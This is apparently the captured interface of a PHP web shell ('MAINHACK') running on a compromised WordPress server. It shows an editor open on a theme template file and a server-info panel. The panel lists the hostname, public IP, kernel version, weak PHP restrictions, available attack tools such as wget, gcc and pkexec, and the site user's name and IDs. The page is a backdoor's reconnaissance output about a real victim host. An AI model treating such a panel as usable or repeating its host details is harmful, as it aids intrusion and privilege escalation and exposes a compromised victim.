[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: header-branding.php
<?php /** * Template part for displaying site branding */ $logo_dark = alico_get_opt( 'logo', array( 'url' => get_template_directory_uri().'/assets/images/logo-dark.png', 'id' => '' ) ); $logo_light = alico_get_opt( 'logo_light', array( 'url' => get_template_directory_uri().'/assets/images/logo-light.png', 'id' => '' ) ); $logo_mobile = alico_get_opt( 'logo_mobile', array( 'url' => get_template_directory_uri().'/assets/images/logo-dark.png', 'id' => '' ) ); $custom_header = alico_get_page_opt('custom_header'); $p_logo_dark = alico_get_page_opt('p_logo_dark'); $p_logo_light = alico_get_page_opt('p_logo_light'); $p_logo_mobile = alico_get_page_opt('p_logo_mobile'); if($custom_header && !empty($p_logo_dark['url'])) { $logo_dark['url'] = $p_logo_dark['url']; } if ($logo_dark['url']) { printf( '<a class="logo-dark" href="%1$s" title="%2$s" rel="home"><img src="%3$s" alt="%2$s"/></a>', esc_url( home_url( '/' ) ), esc_attr( get_bloginfo( 'name' ) ), esc_url( $logo_dark['url'] ) ); } if($custom_header && !empty($p_logo_light['url'])) { $logo_light['url'] = $p_logo_light['url']; } if ($logo_light['url']) { printf( '<a class="logo-light" href="%1$s" title="%2$s" rel="home"><img src="%3$s" alt="%2$s"/></a>', esc_url( home_url( '/' ) ), esc_attr( get_bloginfo( 'name' ) ), esc_url( $logo_light['url'] ) ); } if($custom_header && !empty($p_logo_mobile['url'])) { $logo_mobile['url'] = $p_logo_mobile['url']; } $header_type_page = alico_get_page_opt( 'header_type', 'inherit' ); $e_logo_mobile = alico_get_page_opt( 'e_logo_mobile' ); if($header_type_page == 'builder' && !empty($e_logo_mobile['url']) ) { $logo_mobile['url'] = $e_logo_mobile['url']; } if ($logo_mobile['url']) { printf( '<a class="logo-mobile" href="%1$s" title="%2$s" rel="home"><img src="%3$s" alt="%2$s"/></a>', esc_url( home_url( '/' ) ), esc_attr( get_bloginfo( 'name' ) ), esc_url( $logo_mobile['url'] ) ); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.73 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002